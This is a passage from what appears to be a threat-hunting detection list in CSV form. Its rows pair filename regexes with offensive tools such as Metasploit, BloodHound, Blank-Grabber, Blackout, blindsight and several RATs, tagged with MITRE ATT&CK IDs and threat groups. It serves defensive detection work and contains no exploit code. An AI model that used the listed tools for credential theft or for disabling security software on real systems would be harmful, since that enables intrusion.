and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5678" "*/BITSInject.git*",".{0,1000}\/BITSInject\.git.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","1","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","5679" "*/BITSInject.py*",".{0,1000}\/BITSInject\.py.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","1","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","5680" "*/BITSJobPayloads.py*",".{0,1000}\/BITSJobPayloads\.py.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the 
BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","1","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","5681" "*/bittorrent-discovery.nse*",".{0,1000}\/bittorrent\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5682" "*/bjnp-discover.nse*",".{0,1000}\/bjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5683" "*/Black-key Spoofer.exe*",".{0,1000}\/Black\-key\sSpoofer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5684" 
"*/Blackout.cpp*",".{0,1000}\/Blackout\.cpp.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","5685" "*/Blackout.exe*",".{0,1000}\/Blackout\.exe.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","5686" "*/Blackout.git*",".{0,1000}\/Blackout\.git.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","5687" "*/Blackout.sln*",".{0,1000}\/Blackout\.sln.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","5688" "*/Blackout.sys*",".{0,1000}\/Blackout\.sys.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","5689" "*/blackvision.git*",".{0,1000}\/blackvision\.git.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - 
T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","1","N/A","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","5690" "*/blackvision_c.cpp*",".{0,1000}\/blackvision_c\.cpp.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","N/A","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","5691" "*/Blank%20Grabber/Extras/hash*",".{0,1000}\/Blank\%20Grabber\/Extras\/hash.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","1","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","5692" "*/Blank.Grabber.zip*",".{0,1000}\/Blank\.Grabber\.zip.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","1","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","5693" "*/Blank-Grabber#download*",".{0,1000}\/Blank\-Grabber\#download.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","1","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","5694" "*/Blank-Grabber.git*",".{0,1000}\/Blank\-Grabber\.git.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","1","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","5695" 
"*/BlankOBF.git*",".{0,1000}\/BlankOBF\.git.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","1","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","5696" "*/BlankOBF.py*",".{0,1000}\/BlankOBF\.py.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","1","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","5697" "*/BlankOBFv2.py*",".{0,1000}\/BlankOBFv2\.py.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","1","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","5698" "*/blindeventlog.exe*",".{0,1000}\/blindeventlog\.exe.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","5699" "*/blindsight.exe*",".{0,1000}\/blindsight\.exe.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/0xdea/blindsight","1","1","N/A","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","5700" "*/blindsight.git*",".{0,1000}\/blindsight\.git.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","1","N/A","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","5701" "*/Blizzard-RAT lite.exe*",".{0,1000}\/Blizzard\-RAT\slite\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5702" "*/blob/main/write_anything.c*",".{0,1000}\/blob\/main\/write_anything\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tool","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","N/A","1","2","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z","5703" "*/block_dll_policy.exe*",".{0,1000}\/block_dll_policy\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","5704" "*/blocketw.bin*",".{0,1000}\/blocketw\.bin.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - 
T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","5705" "*/blocketw.exe*",".{0,1000}\/blocketw\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","5706" "*/blocketw.exe*",".{0,1000}\/blocketw\.exe.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","5707" "*/BlockEtw.git*",".{0,1000}\/BlockEtw\.git.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","5708" "*/BlockEtw/tarball/*",".{0,1000}\/BlockEtw\/tarball\/.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","5709" 
"*/BlockEtw/zipball/*",".{0,1000}\/BlockEtw\/zipball\/.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","5710" "*/BlockOpenHandle.git*",".{0,1000}\/BlockOpenHandle\.git.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","N/A","9","2","167","25","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z","5711" "*/BloodHound.exe*",".{0,1000}\/BloodHound\.exe.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","5712" "*/BloodHound.git*",".{0,1000}\/BloodHound\.git.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","5713" "*/bloodhound.md*",".{0,1000}\/bloodhound\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5714" "*/bloodhound.py*",".{0,1000}\/bloodhound\.py.{0,1000}","offensive_tool_keyword","crackmapexec","bloodhound integration with crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","5715" "*/bloodhound/enumeration*",".{0,1000}\/bloodhound\/enumeration.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","5716" "*/bloodhound_domain.py*",".{0,1000}\/bloodhound_domain\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5717" "*/bloodhound_domaintrust.py*",".{0,1000}\/bloodhound_domaintrust\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 
- TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5718" "*/bloodhound_gpo.py*",".{0,1000}\/bloodhound_gpo\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5719" "*/bloodhound_object.py*",".{0,1000}\/bloodhound_object\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5720" "*/bloodhound_ou.py*",".{0,1000}\/bloodhound_ou\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5721" "*/bloodhound_schema.py*",".{0,1000}\/bloodhound_schema\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5722" "*/bloodhound-data*",".{0,1000}\/bloodhound\-data.{0,1000}","offensive_tool_keyword","BloodHound","A Python 
based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","5723" "*/bloodhound-quickwin.git*",".{0,1000}\/bloodhound\-quickwin\.git.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","AD Enumeration","6","3","239","26","2025-04-04T05:11:46Z","2021-02-16T16:04:16Z","5724" "*/bloodhoundsync.py*",".{0,1000}\/bloodhoundsync\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","1","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","5725" "*/bloodyAD.git*",".{0,1000}\/bloodyAD\.git.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","N/A","10","10","1590","145","2025-04-10T10:47:16Z","2021-10-11T15:07:26Z","5726" 
"*/BluePalmRAT.exe*",".{0,1000}\/BluePalmRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5727" "*/bluscreenofjeff/*",".{0,1000}\/bluscreenofjeff\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","5728" "*/BobTheSmuggler.git*",".{0,1000}\/BobTheSmuggler\.git.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","1","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","5729" "*/bof.cpp *",".{0,1000}\/bof\.cpp\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation 
tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","5730" "*/bof.h",".{0,1000}\/bof\.h","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - 